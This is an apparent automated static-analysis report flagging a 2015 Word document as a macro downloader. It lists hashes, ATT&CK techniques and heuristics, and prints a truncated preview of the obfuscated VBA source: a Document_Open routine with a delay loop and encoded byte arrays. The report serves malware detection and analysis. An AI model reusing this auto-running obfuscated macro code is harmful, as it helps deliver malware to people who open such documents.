Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 776a8783eac0f703…

MALICIOUS

Office (OLE)

Size: 210.0 KB
Created: 2015-12-20 00:46:00
Authoring application: Microsoft Office Word
First seen: 2017-11-29
MD5: 9a7a8a289a200953e41cdf4472a055a0
SHA-1: 876b6dd6b969da7e619bae57d6537b1dfd2cee33
SHA-256: 776a8783eac0f703fa2b423eea78948994e9735e6761438c6d28f99f4fa434cb
Risk score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample contains a VBA macro that runs automatically when the document is opened (Document_Open). The macro calls the Shell() function, a common technique for executing arbitrary commands. The presence of the Shell() call strongly suggests the macro is intended to download and execute a secondary payload, making the document a downloader. No specific malware family could be identified.

Heuristics (5)

  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ [In document text (OLE body)]
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/mm/ [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# [In document text (OLE body)]
    • http://purl.org/dc/elements/1.1/ [In document text (OLE body)]
    • http://ns.adobe.com/photoshop/1.0/ [In document text (OLE body)]
    • http://www.iec.ch [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45842 bytes
SHA-256: 0b3046f781918dc9b8e4cb2ee912ab308176f2b8fdc5be6237d3a5e0c96ac852

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function PKRuK2fNdVxFB Lib "T6lvGFt72exxq" Alias "QcghniC" (ByVal S2fmUIJLe As String, A2Rid9IP8w As Long) As Long
#Else
Private Declare Function PKRuK2fNdVxFB lib "T6lvGFt72exxq" Alias "QcghniC"(byval S2fmUIJLe as String, A2Rid9IP8w as Long ) as Long
#End If
Dim HLnJXH1bmOF3 As String, GyCvq As Integer
Dim GyCvq1() As Variant, GyCvq2() As Variant, GyCvq3() As Variant, GyCvq4() As Variant, GyCvq5() As Variant, GyCvq6() As Variant, GyCvq7() As Variant, GyCvq8() As Variant, GyCvq9() As Variant, GyCvq10() As Variant
Dim GyCvq11() As Variant, GyCvq12() As Variant, GyCvq13() As Variant, GyCvq14() As Variant, GyCvq15() As Variant, GyCvq16() As Variant, GyCvq17() As Variant, GyCvq18() As Variant, GyCvq19() As Variant, GyCvq20() As Variant
Dim GyCvq21() As Variant, GyCvq22() As Variant, GyCvq23() As Variant, GyCvq24() As Variant, GyCvq25() As Variant, GyCvq26() As Variant, GyCvq27() As Variant, GyCvq28() As Variant, GyCvq29() As Variant, GyCvq30() As Variant, GyCvq31() As Variant, GyCvq32() As Variant, GyCvq33() As Variant, GyCvq34() As Variant, GyCvq35() As Variant, GyCvq36() As Variant
Sub Document_Open()
R7O1H2H3zI = 66 + "25"
On Error Resume Next
MD1XgpZ1pvB55y = 22 + "85"
Dim Kf0pgDeD2QME As Long, Bna2eaHvItP2PN As Long, WFoVlONXW2AD As Long, YtJXNbAM10p As Long
Ea7EVpjs = 70 + "46"
Kf0pgDeD2QME = 92238969: Bna2eaHvItP2PN = 0: WFoVlONXW2AD = 0
BzWEvA933 = 88 + "20"
For Bna2eaHvItP2PN = 1 To Kf0pgDeD2QME
WFoVlONXW2AD = WFoVlONXW2AD + 1
Next Bna2eaHvItP2PN
JZL4UQ92uel4B = 23 + "62"
If WFoVlONXW2AD = Kf0pgDeD2QME Then
SeLEK = 56 + "91"
Dim S3VoJ54dB As Integer, B4HWNSKEwh As String
For S3VoJ54dB = 6 To 974
B4HWNSKEwh = B4HWNSKEwh + S3VoJ54dB
Next
JJcm1AOrQT3 = 14 + "18"
YtJXNbAM10p = PKRuK2fNdVxFB("D69lbG7N", 48)
Qio6JWniPunO = 41 + "8"
If (26.5 + 6 + 26.5 - 6) = (26.5 + 8 + 26.5 - 8) Then
SmEqmQo7WIE = 98 + "90"
MYlp4jaVW = 67 + "77"
If zKK(73) = True Then
G2OERK33o = 48 + "8"
SiNwcydd
NsBU3RiWPAsR5kv = 90 + "79"
Else
NhJrp6cE4jcxsT5 = 89 + "58"
MA9o9cPSK5hcO
PMUmGTj7VBjk = 79 + "39"
End If
Else
W1JPoqO = 93 + "45"
MA9o9cPSK5hcO
LIx5J0DQDSAph = 98 + "30"
End If
CxR = 70 + "43"
Else
Yh9QEdd8 = 52 + "97"
MA9o9cPSK5hcO
HxFz4G3yVn = 75 + "27"
End If
HDyHXOIsEi7F = 86 + "94"
End Sub
Sub MA9o9cPSK5hcO()
DRJ9RcaC34U = 10 + "97"
Stop
Partition 58, 6, 35, 21
XmvssUFxoSD = Fix(90)
DateSerial 55, 60, 54
Beep
DateDiff "AyhPtMJO", 63, 89
REQh0kUI80hO = CVErr(10)
Round 50, 76
Resume
Log 51
H6JRAMZiRO1sMhOdf = 20 + "28"
End Sub
Sub JIT9N(PqcAr2DChjNPmswxj As Long)
Ofj = 29 + "74"
Dim MwUs As Long
D8vzZy23Yrz = 26 + "9"
MwUs = Timer + PqcAr2DChjNPmswxj
Do While Timer < MwUs
DoEvents
Loop
KKKBu1p93DmpgX = 77 + "1"
End Sub
Sub SiNwcydd()
G1I0ynas = 45 + "84"
On Error Resume Next
EIbYaWWMmRw = 69 + "45"
GyCvq1() = Array(172, 166, 172, 231, 170, 179, 8, 70, 107, 29, 30, 97, 44, 25, 126, 56, 66, 81, 2, 7, 122, 106, 105, 28, 10, 127, 107, 99, 111, 102, 99, 12, 53, 53, 52, 51, 80, 57, 19, 56, 18, 74, 100, 35, 64, 6, 116, 74, 123, 39, 38, 30, 110, 33, 84, 100, 93, 120, 73, 91, 125, 98, 89, 37, 59, 61, 30, 60, 34, 28, 18, 66, 77, 44, 65, 98, 73, 91, 7, 14, 62, 96, 19, 116, 23, 57, 96, 100, 24, 25, 24, 57, 38, 89, 57, 65, 126, 119, 114, 119, 1, 30, 24, 52, 60, 39, 107, 58, 91, 12, 114, 120, 111, 92, 114, 106, 83, 10, 117, 5, 48, 111, 29, 10, 105, 107, 110, 107, 248, 219, 146, 240, 193, 195, 217, 195, 159, 239, 223, 206, 206, 212, 219, 153, 138, 192, 185, 151, 254, 246, 223, 160, 149, 234, 195, 183, 147, 194, 128, 237, 226, 229, 195, 216, 216, 172, 161, 161, 180, 191, 163, 169, 185, 187, 190, 187, 206, 246, 187, 210, 182, 200, 137, 131, 208, 203, 229, 246, 195, 203, 168, 218, 129, 178, 160, 192, 187, 171, 157, 204, 200, 214, 216)
PeP = 79 + "67"
GyCvq2
... (truncated)